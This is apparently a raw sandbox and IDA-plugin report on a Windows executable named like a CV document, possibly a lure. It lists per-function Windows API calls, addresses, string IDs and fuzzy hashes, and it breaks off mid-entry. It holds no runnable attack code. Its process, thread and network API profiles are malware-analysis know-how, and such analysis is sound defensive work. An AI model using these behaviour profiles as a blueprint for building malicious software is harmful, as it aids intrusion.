                                                                                        • Opcode ID: 0d4243cc126de128a78e078eed2ba8ee9643e9bac883b865d8f96873aab12cc5
                                                                                        • Instruction ID: 2f15957cb090bc338f73ab16e11b9d6f697273d27abf07a2d86ef61a967d0f94
                                                                                        • Opcode Fuzzy Hash: 0d4243cc126de128a78e078eed2ba8ee9643e9bac883b865d8f96873aab12cc5
                                                                                        • Instruction Fuzzy Hash: DB519132604700AFDB12EF64DD45B2AB7E4EF48320F05496AF955EB3A0DB70E905CB41
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 003CE396
                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003CE40C
                                                                                        • GetLastError.KERNEL32 ref: 003CE416
                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 003CE483
                                                                                        Similarity
                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                        • API String ID: 4194297153-14809454
                                                                                        • Opcode ID: 4b51c5d4f01e2b8730b7feeeb8f1da135d5c216f12cf4a0cdfa881d702d27fdc
                                                                                        • Instruction ID: 43f633d4d4904d860d0687677837eb37f63ae063dea0dd4fcec1f705afa980f8
                                                                                        • Opcode Fuzzy Hash: 4b51c5d4f01e2b8730b7feeeb8f1da135d5c216f12cf4a0cdfa881d702d27fdc
                                                                                        • Instruction Fuzzy Hash: 6131B536A002099FDB06EFA5CD45FBDB7B8EF48301F14806AE505EB291DB74AE01CB51
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003BB98C
                                                                                        • GetDlgCtrlID.USER32 ref: 003BB997
                                                                                        • GetParent.USER32 ref: 003BB9B3
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 003BB9B6
                                                                                        • GetDlgCtrlID.USER32(?), ref: 003BB9BF
                                                                                        • GetParent.USER32(?), ref: 003BB9DB
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 003BB9DE
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1383977212-1403004172
                                                                                        • Opcode ID: 6be8fa6e2d8fa72076ba9e7dd0ca391f18fd35857b868e7161cbd3d6f719767a
                                                                                        • Instruction ID: 394db5c1df7ddfc986fd27747add96356bce9017b8350c8420054536fd691011
                                                                                        • Opcode Fuzzy Hash: 6be8fa6e2d8fa72076ba9e7dd0ca391f18fd35857b868e7161cbd3d6f719767a
                                                                                        • Instruction Fuzzy Hash: E721C874900208BFDB06ABB4CC85EFEB7B5EF49304F100156F651A72D1DBB55919DB24
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003BBA73
                                                                                        • GetDlgCtrlID.USER32 ref: 003BBA7E
                                                                                        • GetParent.USER32 ref: 003BBA9A
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 003BBA9D
                                                                                        • GetDlgCtrlID.USER32(?), ref: 003BBAA6
                                                                                        • GetParent.USER32(?), ref: 003BBAC2
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 003BBAC5
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1383977212-1403004172
                                                                                        • Opcode ID: 7d7b32edb288652c998357f25388d422a625d682db28778a077ebb5658b5396c
                                                                                        • Instruction ID: 140918fcf28eddcd380b347d3022ec2998be01721935e5cc31f29fa693298b84
                                                                                        • Opcode Fuzzy Hash: 7d7b32edb288652c998357f25388d422a625d682db28778a077ebb5658b5396c
                                                                                        • Instruction Fuzzy Hash: DE2180B4E40208BFDB02ABA4CC85EFEBBB9EF49304F104056F651A7191DBB95919DB24
                                                                                        APIs
                                                                                        • GetParent.USER32 ref: 003BBAE3
                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 003BBAF8
                                                                                        • _wcscmp.LIBCMT ref: 003BBB0A
                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003BBB85
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                        • API String ID: 1704125052-3381328864
                                                                                        • Opcode ID: 99dd46b76e1220df3e964cc93eb06571795d9a59dcf0c7155aa5fe640b36981d
                                                                                        • Instruction ID: f4495fe55bd1568f88df23e8ab99e3ea6b94e649db83fb95485dce1b0ce54e4e
                                                                                        • Opcode Fuzzy Hash: 99dd46b76e1220df3e964cc93eb06571795d9a59dcf0c7155aa5fe640b36981d
                                                                                        • Instruction Fuzzy Hash: 82110676608307FEFA26B630DC06EE6B79CDB16728F200022FA04F58D5EFE668114518
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 003DB2D5
                                                                                        • CoInitialize.OLE32(00000000), ref: 003DB302
                                                                                        • CoUninitialize.OLE32 ref: 003DB30C
                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 003DB40C
                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 003DB539
                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 003DB56D
                                                                                        • CoGetObject.OLE32(?,00000000,0040D91C,?), ref: 003DB590
                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 003DB5A3
                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 003DB623
                                                                                        • VariantClear.OLEAUT32(0040D91C), ref: 003DB633
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 2395222682-0
                                                                                        • Opcode ID: 89f6454e27657fdb13fc545961175b9edccca4680b46da445f74807351a2387f
                                                                                        • Instruction ID: ae061dfa9f0d3bfea0d5ace9bcfe17bfda060e92dc232bdff0adf2a49f096dc0
                                                                                        • Opcode Fuzzy Hash: 89f6454e27657fdb13fc545961175b9edccca4680b46da445f74807351a2387f
                                                                                        • Instruction Fuzzy Hash: 7FC123B2608300EFC701EF65D884A6AB7E9BF89308F01495EF58A9B351DB71ED05CB52
                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 003AACC1
                                                                                          • Part of subcall function 003A7CF4: __mtinitlocknum.LIBCMT ref: 003A7D06
                                                                                          • Part of subcall function 003A7CF4: EnterCriticalSection.KERNEL32(00000000,?,003A7ADD,0000000D), ref: 003A7D1F
                                                                                        • __calloc_crt.LIBCMT ref: 003AACD2
                                                                                          • Part of subcall function 003A6986: __calloc_impl.LIBCMT ref: 003A6995
                                                                                          • Part of subcall function 003A6986: Sleep.KERNEL32(00000000,000003BC,0039F507,?,0000000E), ref: 003A69AC
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 003AACED
                                                                                        • GetStartupInfoW.KERNEL32(?,00436E28,00000064,003A5E91,00436C70,00000014), ref: 003AAD46
                                                                                        • __calloc_crt.LIBCMT ref: 003AAD91
                                                                                        • GetFileType.KERNEL32(00000001), ref: 003AADD8
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 003AAE11
                                                                                        Similarity
                                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 1426640281-0
                                                                                        • Opcode ID: 8a5f7cb16190a6bc799bd8870fdf4dfc1e055d712ab1589e24cec5c2af9800ac
                                                                                        • Instruction ID: 80ccb4ca5efcea7e3eb61e10f7ce498d3da2d4676b078a867d4b17cd826daf0a
                                                                                        • Opcode Fuzzy Hash: 8a5f7cb16190a6bc799bd8870fdf4dfc1e055d712ab1589e24cec5c2af9800ac
                                                                                        • Instruction Fuzzy Hash: 4481E6B2905B458FDB15CF68C8415ADBBF4EF0B320B24426DE4A6AB3D1D7349803CB56
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 003C4047
                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003C30A5,?,00000001), ref: 003C405B
                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 003C4062
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003C30A5,?,00000001), ref: 003C4071
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 003C4083
                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003C30A5,?,00000001), ref: 003C409C
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003C30A5,?,00000001), ref: 003C40AE
                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003C30A5,?,00000001), ref: 003C40F3
                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003C30A5,?,00000001), ref: 003C4108
                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003C30A5,?,00000001), ref: 003C4113
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                        • String ID:
                                                                                        • API String ID: 2156557900-0
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000008), ref: 0039B496
                                                                                        • SetTextColor.GDI32(?,000000FF), ref: 0039B4A0
                                                                                        • SetBkMode.GDI32(?,00000001), ref: 0039B4B5
                                                                                        • GetStockObject.GDI32(00000005), ref: 0039B4BD
                                                                                        • GetClientRect.USER32(?), ref: 003FDD63
                                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 003FDD7A
                                                                                        • GetWindowDC.USER32(?), ref: 003FDD86
                                                                                        • GetPixel.GDI32(00000000,?,?), ref: 003FDD95
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 003FDDA7
                                                                                        • GetSysColor.USER32(00000005), ref: 003FDDC5
                                                                                        Similarity
                                                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3430376129-0
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003830DC
                                                                                        • CoUninitialize.OLE32(?,00000000), ref: 00383181
                                                                                        • UnregisterHotKey.USER32(?), ref: 003832A9
                                                                                        • DestroyWindow.USER32(?), ref: 003F5079
                                                                                        • FreeLibrary.KERNEL32(?), ref: 003F50F8
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003F5125
                                                                                        Similarity
                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                        • String ID: close all
                                                                                        • API String ID: 469580280-3243417748
                                                                                        APIs
                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 0039CC15
                                                                                          • Part of subcall function 0039CCCD: GetClientRect.USER32(?,?), ref: 0039CCF6
                                                                                          • Part of subcall function 0039CCCD: GetWindowRect.USER32(?,?), ref: 0039CD37
                                                                                          • Part of subcall function 0039CCCD: ScreenToClient.USER32(?,?), ref: 0039CD5F
                                                                                        • GetDC.USER32 ref: 003FD137
                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003FD14A
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 003FD158
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 003FD16D
                                                                                        • ReleaseDC.USER32(?,00000000), ref: 003FD175
                                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003FD200
                                                                                        Similarity
                                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                        • String ID: U
                                                                                        • API String ID: 4009187628-3372436214
                                                                                        APIs
                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003D45FF
                                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003D462B
                                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 003D466D
                                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003D4682
                                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D468F
                                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003D46BF
                                                                                        • InternetCloseHandle.WININET(00000000), ref: 003D4706
                                                                                          • Part of subcall function 003D5052: GetLastError.KERNEL32(?,?,003D43CC,00000000,00000000,00000001), ref: 003D5067
                                                                                        Similarity
                                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                        • String ID:
                                                                                        • API String ID: 1241431887-3916222277
                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0041DC00), ref: 003DB715
                                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0041DC00), ref: 003DB749
                                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003DB8C1
                                                                                        • SysFreeString.OLEAUT32(?), ref: 003DB8EB
                                                                                        Similarity
                                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                        • String ID:
                                                                                        • API String ID: 560350794-0
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003E24F5
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003E2688
                                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003E26AC
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003E26EC
                                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003E270E
                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003E286F
                                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003E28A1
                                                                                        • CloseHandle.KERNEL32(?), ref: 003E28D0
                                                                                        • CloseHandle.KERNEL32(?), ref: 003E2947
                                                                                        Similarity
                                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                        • String ID:
                                                                                        • API String ID: 4090791747-0
                                                                                        APIs
                                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 003EB3F4
                                                                                        Similarity
                                                                                        • API ID: InvalidateRect
                                                                                        • String ID:
                                                                                        • API String ID: 634782764-0
                                                                                        APIs
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 003FDB1B
                                                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 003FDB3C
                                                                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 003FDB51
                                                                                        • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 003FDB6E
                                                                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 003FDB95
                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0039A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003FDBA0
                                                                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 003FDBBD
                                                                                        • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0039A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 003FDBC8
                                                                                        Similarity
                                                                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 1268354404-0
                                                                                        • Opcode ID: 59a02547af0e8a2540a327a7ccc765c64fdc276c516f139e30a9287a16205482
                                                                                        • Instruction ID: 2c2be495fa4fdd6f1b2ee4d7785c1d1af8f3b5acb670a6309bc79f4fb8591639
                                                                                        • Opcode Fuzzy Hash: 59a02547af0e8a2540a327a7ccc765c64fdc276c516f139e30a9287a16205482
                                                                                        • Instruction Fuzzy Hash: 0C518F70600609EFDF22DFA4CC86FAA77B9EB18750F110628F9469B690D770ED90DB94
                                                                                        APIs
                                                                                          • Part of subcall function 003C6EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,003C5FA6,?), ref: 003C6ED8
                                                                                          • Part of subcall function 003C6EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,003C5FA6,?), ref: 003C6EF1
                                                                                          • Part of subcall function 003C72CB: GetFileAttributesW.KERNEL32(?,003C6019), ref: 003C72CC
                                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 003C75CA
                                                                                        • _wcscmp.LIBCMT ref: 003C75E2
                                                                                        • MoveFileW.KERNEL32(?,?), ref: 003C75FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 793581249-0
                                                                                        • Opcode ID: 6348c5f7e98e5bd9d99b8eb279aa6c30c77b17296f22bb6d8e082d538a96bdf5
                                                                                        • Instruction ID: fd749324165d443caf94369db3c02e0fc433e79742abf7b2af55927a5747307f
                                                                                        • Opcode Fuzzy Hash: 6348c5f7e98e5bd9d99b8eb279aa6c30c77b17296f22bb6d8e082d538a96bdf5
                                                                                        • Instruction Fuzzy Hash: D65153B2A092195ADF56EB94D841EDD73BC9F09320F0040AEFA05E7041EA749BC9CF64
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,003FDAD1,00000004,00000000,00000000), ref: 0039EAEB
                                                                                        • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,003FDAD1,00000004,00000000,00000000), ref: 0039EB32
                                                                                        • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,003FDAD1,00000004,00000000,00000000), ref: 003FDC86
                                                                                        • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,003FDAD1,00000004,00000000,00000000), ref: 003FDCF2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ShowWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1268545403-0
                                                                                        • Opcode ID: ff021ebc309a0347851054dc475189df669dcf314287e3d93fad545bdb33d787
                                                                                        • Instruction ID: 11f265c2481e87dc32e38115c8b0109be1b72b2e2234907d9f370492d12d82dc
                                                                                        • Opcode Fuzzy Hash: ff021ebc309a0347851054dc475189df669dcf314287e3d93fad545bdb33d787
                                                                                        • Instruction Fuzzy Hash: 6A411A7161D280DBDF37CB288D8DB3A7A9ABB41302F1B081DF14796965C671B880C315
                                                                                        APIs
                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,003BAEF1,00000B00,?,?), ref: 003BB26C
                                                                                        • HeapAlloc.KERNEL32(00000000,?,003BAEF1,00000B00,?,?), ref: 003BB273
                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,003BAEF1,00000B00,?,?), ref: 003BB288
                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,003BAEF1,00000B00,?,?), ref: 003BB290
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,003BAEF1,00000B00,?,?), ref: 003BB293
                                                                                        • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,003BAEF1,00000B00,?,?), ref: 003BB2A3
                                                                                        • GetCurrentProcess.KERNEL32(003BAEF1,00000000,?,003BAEF1,00000B00,?,?), ref: 003BB2AB
                                                                                        • DuplicateHandle.KERNEL32(00000000,?,003BAEF1,00000B00,?,?), ref: 003BB2AE
                                                                                        • CreateThread.KERNEL32(00000000,00000000,003BB2D4,00000000,00000000,00000000), ref: 003BB2C8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                        • String ID:
                                                                                        • API String ID: 1957940570-0
                                                                                        • Opcode ID: fd15fa8aeeab65505bbf4e9f31326ab57b96c5f4a39abd00872ddb06820b3c34
                                                                                        • Instruction ID: 320dace33e69770c3f7c1890a216d542952d92cc4d80ef89c12c607882e9d76d
                                                                                        • Opcode Fuzzy Hash: fd15fa8aeeab65505bbf4e9f31326ab57b96c5f4a39abd00872ddb06820b3c34
                                                                                        • Instruction Fuzzy Hash: 8701BBB5640304BFE710ABA5DD49F6B7BACEB88711F018421FA05EB1A1CA749C04CB65
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                        • API String ID: 0-572801152
                                                                                        • Opcode ID: e8d8803a9b79615668aa4dc4f0c610406f5a925a982cc721cc8995c3736ec947
                                                                                        • Instruction ID: 22c9c812a7a0a11a989399004beb19f596b31571e033c9fd9d9b87bf6c33d06c
                                                                                        • Opcode Fuzzy Hash: e8d8803a9b79615668aa4dc4f0c610406f5a925a982cc721cc8995c3736ec947
                                                                                        • Instruction Fuzzy Hash: 06E1A472A2021A9FDF16DFA4E881BAE77B5EF48314F15502AE905AB381D770ED41CB90
                                                                                        APIs
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                          • Part of subcall function 0039C6F4: _wcscpy.LIBCMT ref: 0039C717
                                                                                        • _wcstok.LIBCMT ref: 003D184E
                                                                                        • _wcscpy.LIBCMT ref: 003D18DD
                                                                                        • _memset.LIBCMT ref: 003D1910
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                        • String ID: X$p2Cl2C
                                                                                        • API String ID: 774024439-3256438142
                                                                                        • Opcode ID: cfb826c1d9aa496098f73802562c2d9d9143a37b427655fae22a253adec6f679
                                                                                        • Instruction ID: 36030878e110ea7166b5aae9a18499eb311880158185feb33cd3cb45cba88c1f
                                                                                        • Opcode Fuzzy Hash: cfb826c1d9aa496098f73802562c2d9d9143a37b427655fae22a253adec6f679
                                                                                        • Instruction Fuzzy Hash: 2DC19E316043409FC726FF24D991A5AB7E4BF85350F00496EF89A9B3A2DB70EC04CB82
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 003E9B19
                                                                                        • SendMessageW.USER32(?,00001036,00000000,?), ref: 003E9B2D
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 003E9B47
                                                                                        • _wcscat.LIBCMT ref: 003E9BA2
                                                                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 003E9BB9
                                                                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 003E9BE7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window_wcscat
                                                                                        • String ID: SysListView32
                                                                                        • API String ID: 307300125-78025650
                                                                                        • Opcode ID: e8e59e914aeff0e24e5c7dc1ec44e4cbc0c06aa3e7c4d398e19c05b489384c07
                                                                                        • Instruction ID: 1c0e88c478795dedad3606f16332283c94d7e272c2a71b396189c9ad2eba92ff
                                                                                        • Opcode Fuzzy Hash: e8e59e914aeff0e24e5c7dc1ec44e4cbc0c06aa3e7c4d398e19c05b489384c07
                                                                                        • Instruction Fuzzy Hash: 5241E170900358AFDB229FA4CC85FEE77A8EF08350F11092AF545A72D1D7719D84CB64
                                                                                        APIs
                                                                                          • Part of subcall function 003C6532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 003C6554
                                                                                          • Part of subcall function 003C6532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 003C6564
                                                                                          • Part of subcall function 003C6532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003C65F9
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003E179A
                                                                                        • GetLastError.KERNEL32 ref: 003E17AD
                                                                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003E17D9
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 003E1855
                                                                                        • GetLastError.KERNEL32(00000000), ref: 003E1860
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 003E1895
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
